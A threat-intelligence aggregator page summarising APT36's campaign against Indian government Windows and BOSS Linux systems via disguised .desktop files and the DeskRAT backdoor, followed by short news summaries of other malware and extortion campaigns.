CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign

First reported
Last updated
3 unique sources, 4 articles

Summary

Hide ▲

APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader trend of targeted activity by South and East Asian threat actors, reflecting a trend toward purpose-built malware and infrastructure.

Timeline

  1. 23.10.2025 18:30 2 articles · 1d ago

    APT36 Uses DeskRAT for Enhanced Command and Control

    The malware is a Golang-based remote access Trojan (RAT) called DeskRAT. It can upload and execute files remotely, collect sensitive files under 100MB, and maintain persistence through multiple Linux-specific techniques. The campaign uses a new, sophisticated command interface for managing compromised systems, allowing real-time monitoring, file collection, and remote access across infected hosts. The malware includes anti-debugging and anti-sandbox checks, and uses WebSocket for C2 communication. The campaign reflects a trend toward purpose-built malware and infrastructure, with frequent operations and a high delivery cadence.

    Show sources
    Open in new tab
  2. 25.08.2025 11:13 2 articles · 2mo ago

    APT36 Targets Indian Entities with Linux .desktop File Malware

    The campaign now targets both Windows and BOSS Linux systems. The malware uses a shell script to download and execute a hex-encoded file from an attacker-controlled server and opens a decoy PDF to deceive the user. The malware performs system reconnaissance and includes anti-debugging and anti-sandbox checks. It deploys a known Transparent Tribe backdoor called Poseidon and targets the Kavach 2FA solution used by Indian government agencies. The campaign uses typo-squatted domains and infrastructure hosted on Pakistan-based servers. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution.

    Show sources
    Open in new tab
  3. 22.08.2025 21:35 4 articles · 2mo ago

    APT36 Targets Indian Entities with Linux .desktop File Malware

    The campaign began in June 2025 and primarily targeted systems running the Bharat Operating System Solutions (BOSS) Linux distribution. The malware uses dedicated staging servers to distribute malware and includes functions suggesting the use of large language models (LLMs) in its development. The operation coincided with protests in Ladakh and New Delhi in August and September 2025, which were used as lures. The campaign reflects a trend toward purpose-built malware and infrastructure. The campaign targets Indian government entities with a Golang-based malware known as DeskRAT. The malware uses multiple persistence methods, including systemd services, cron jobs, and autostart configurations.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

XWorm malware variants with ransomware module and over 35 plugins observed

XWorm malware, first observed in 2022, has resurfaced with enhanced capabilities. New versions (6.0, 6.4, and 6.5) include a ransomware module and over 35 plugins, enabling data theft, keylogging, DDoS attacks, and more. The malware is being distributed in phishing campaigns and has been adopted by multiple threat actors. The original developer, XCoder, abandoned the project last year, leading to the proliferation of cracked versions. XWorm's modular architecture allows it to steal data, take control of the host, and encrypt files. Recent campaigns have used various delivery methods, including JavaScript, PowerShell, and AI-themed lures. The ransomware module, Ransomware.dll, encrypts files in specific locations and provides ransom instructions. The malware has been observed in campaigns targeting users in multiple countries, with over 18,459 infections reported in one campaign. XWorm 6.0 is being sold on cybercrime forums for $500 for lifetime access and connects to its C2 server at 94.159.113[.]64 on port 4411. The malware's plugins include modules for remote desktop access, data theft, file management, and system command execution.

Open in new tab

Confucius Targets Pakistan with WooperStealer and Anondoor Malware

The threat actor Confucius has launched a new phishing campaign targeting Pakistan, deploying WooperStealer and Anondoor malware. The campaign has targeted government agencies, military organizations, defense contractors, and critical industries since at least December 2024. The attacks use spear-phishing and malicious documents to deliver malware that steals sensitive data and exfiltrates device information. Confucius has shifted from document-focused stealers to more advanced Python-based backdoors like Anondoor, which provides long-term persistence and command execution capabilities. The group employs DLL side-loading, obfuscated PowerShell scripts, scheduled tasks, and stealthy exfiltration routines to achieve persistence and evade detection. Anondoor is capable of full host profiling, collecting system details, geolocating public IPs, and inventoring disk volumes before receiving tasking from its command-and-control (C2) servers.

Open in new tab

Clop extortion campaign targets Oracle E-Business Suite

The Clop ransomware gang has been exploiting multiple vulnerabilities in Oracle E-Business Suite since at least August 2025, including the zero-day vulnerability CVE-2025-61882. The gang has been sending extortion emails to executives at multiple organizations, claiming to have stolen sensitive data. The campaign involves a high-volume email blast from hundreds of compromised accounts, some previously linked to the FIN11 threat group. The emails contain contact addresses known to be listed on the Clop ransomware gang's data leak site. CrowdStrike attributes the exploitation of CVE-2025-61882 to the Cl0p ransomware gang with moderate confidence, and the first known exploitation occurred on August 9, 2025. The exploit involves an HTTP request to /OA_HTML/SyncServlet, resulting in an authentication bypass. Oracle has released an emergency patch for the zero-day vulnerability and shared indicators of compromise. The exploit was leaked by a group called Scattered Lapsus$ Hunters, raising questions about their potential collaboration with Clop. Envoy Air, a subsidiary of American Airlines, confirms that data was compromised from its Oracle E-Business Suite application after the Clop extortion gang listed American Airlines on its data leak site. Envoy Air stated that no sensitive or customer data was affected, but a limited amount of business information and commercial contact details may have been compromised. The Clop gang is also extorting Harvard University, with the university confirming that the incident impacts a limited number of parties associated with a small administrative unit. Oracle has confirmed that known vulnerabilities in its E-Business Suite, patched in July 2025, may have been exploited in these attacks. The July 2025 Critical Patch Update addressed 309 vulnerabilities across Oracle's product range, including nine for E-Business Suite. Three of these vulnerabilities are critical and three others are exploitable remotely without authentication. The extortion emails are part of a broader campaign, with the attackers sending messages from compromised accounts, some previously associated with the FIN11 threat group. The emails contain contact addresses known to be listed on the Clop ransomware gang's data leak site. Mandiant and GTIG are investigating the claims and recommend that organizations receiving these emails investigate their environments for unusual access or compromise in their Oracle E-Business Suite platforms. The UK’s National Cyber Security Centre (NCSC) has advised Oracle EBS customers to patch the critical vulnerability CVE-2025-61882, which is being exploited by the Clop ransomware group. The NCSC has urged customers to apply an emergency security update from Oracle, published over the weekend, to address the zero-day vulnerability CVE-2025-61882. The vulnerability impacts Oracle EBS versions 12.2.3-12.2.14 and allows unauthenticated attackers to send specially crafted HTTP requests to the affected component, resulting in full system compromise. The NCSC has warned that the Scattered Lapsus$ Hunters group has leaked the exploit used by the Clop gang, increasing the risk of opportunistic attacks on Oracle customers. Rapid7 has advised customers of affected Oracle EBS instances to conduct threat hunting to detect any potential malicious activity, given that exploitation in-the-wild may have occurred since August 2025. CISA has added CVE-2025-61882 to the Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by October 27, 2025. WatchTowr Labs warns of potential mass, indiscriminate exploitation from multiple groups within days.

Open in new tab

Phantom Taurus Targets Government and Telecommunications Organizations

Government and telecommunications organizations in Africa, the Middle East, and Asia have been targeted by a China-aligned nation-state actor known as Phantom Taurus over the past two-and-a-half years. The group focuses on espionage, targeting ministries of foreign affairs, embassies, geopolitical events, and military operations. Phantom Taurus employs custom-developed tools and techniques, including a bespoke malware suite named NET-STAR, to maintain long-term intelligence collection and obtain confidential data from targets of strategic interest to China. The group's activities coincide with major global events and regional security affairs, demonstrating stealth, persistence, and adaptability in their tactics, techniques, and procedures (TTPs). Phantom Taurus has been observed using a .NET malware suite named NET-STAR to breach IIS web servers, which operates almost entirely in memory and includes a fileless backdoor that establishes encrypted command-and-control (C2) sessions. The suite includes a backdoor named IIServerCore that accepts commands and encoded .NET payloads, enabling arbitrary code execution on compromised systems. The suite also includes two AssemblyExecuter loaders (v1 and v2) that allow dynamic loading of additional .NET malware, with v2 featuring advanced evasion techniques such as AMSI and ETW bypass. The group uses custom SQL queries to search for specific tables and keywords on compromised systems, exporting all matching results. Additionally, Phantom Taurus's operational methods are supported by other custom malware, including TunnelSpecter and SweetSpecter, which are used for email exfiltration.

Open in new tab

XCSSET macOS Malware Targets Xcode Developers with Enhanced Features

A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced features. This variant includes improved browser targeting, clipboard hijacking, and persistence mechanisms. The malware spreads by infecting Xcode projects, stealing cryptocurrency, and browser data from infected devices. The malware uses run-only compiled AppleScripts for stealthy execution and employs sophisticated encryption and obfuscation techniques. It incorporates new modules for data exfiltration, persistence, and clipboard monitoring. The malware has been observed in limited attacks, with Microsoft sharing findings with Apple and GitHub to mitigate the threat. Developers are advised to keep macOS and apps up to date and inspect Xcode projects before building them.

Open in new tab